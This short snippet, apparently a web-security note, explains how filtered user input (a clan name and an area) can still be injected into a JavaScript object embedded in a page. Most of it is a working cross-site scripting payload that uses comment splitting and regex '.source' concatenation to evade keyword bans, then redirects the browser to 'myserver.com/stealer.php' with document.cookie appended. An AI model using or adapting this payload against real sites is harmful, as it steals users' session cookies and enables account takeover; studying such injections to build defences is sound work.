For a dictionary with user input data :
- A clan name
- An area
Even if JS keywords and most special characters are banned, a malevolent user can still manage to exploit the data.
For example, using advanced techniques such as characters escaping and updating to DOM, an attacker will be able to totally change a function to its will.
<script type="text/javascript">
this.character= {
"player": "Kaƫl",
"clan": "Losnia",
"functions": {
"compute": this.compute,
"reset": this.reset,
"giveup": this.giveup
},
"area": "France"
};
</script>
clan="/*
area=a*/,functions:{computer:this.compute,reset:this.reset,giveup:{d:window[ /locat/.source%2B/ion/.source]=/https:\/\/myserver.com\/stealer.php?c=/.source%2Bdocument.cookie}}//